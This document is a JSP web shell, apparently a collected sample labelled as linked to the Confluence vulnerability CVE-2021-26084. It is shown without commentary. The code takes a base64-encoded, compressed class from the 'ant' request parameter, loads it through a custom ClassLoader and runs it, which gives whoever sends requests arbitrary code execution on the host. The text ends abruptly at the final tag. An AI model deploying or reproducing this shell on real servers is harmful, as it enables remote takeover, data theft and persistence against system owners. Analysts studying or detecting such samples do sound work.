2022-06-03_AtlassianConfluence_Webshell_CVE-2021-26084

<%@page import="java.util.*,java.io.*,java.util.zip.*"%>
<%!
  class U extends ClassLoader {
    U(ClassLoader c) {
      super(c);
    }
    public Class g(byte[] b) {
      return super.defineClass(b, 0, b.length);
    }
  }
  public byte[] decompress(byte[] data) {
    byte[] output = new byte[0];
    Inflater dc = new Inflater();
    dc.reset();
    dc.setInput(data);
    ByteArrayOutputStream o = new ByteArrayOutputStream(data.length);
    try {
      byte[] buf = new byte[1024];
      while (!dc.finished()) {
        int i = dc.inflate(buf);
        o.write(buf, 0, i);
      }
      output = o.toByteArray();
    } catch (Exception e) {
        output = data;
        e.printStackTrace();
    } finally {
      try {
          o.close();
      } catch (IOException e) {
          e.printStackTrace();
      }
    }
    dc.end();
    return output;
  }
  public byte[] base64Decode(String str) throws Exception {
    try {
      Class clazz = Class.forName("sun.misc.BASE64Decoder");
      return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
    } catch (Exception e) {
      Class clazz = Class.forName("java.util.Base64");
      Object decoder = clazz.getMethod("getDecoder").invoke(null);
      return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
    }
  }
%>
<%
  String cls = request.getParameter("ant");
  if (cls != null) {
    new U(this.getClass().getClassLoader()).g(decompress(base64Decode(cls))).newInstance().equals(pageContext);
  }
%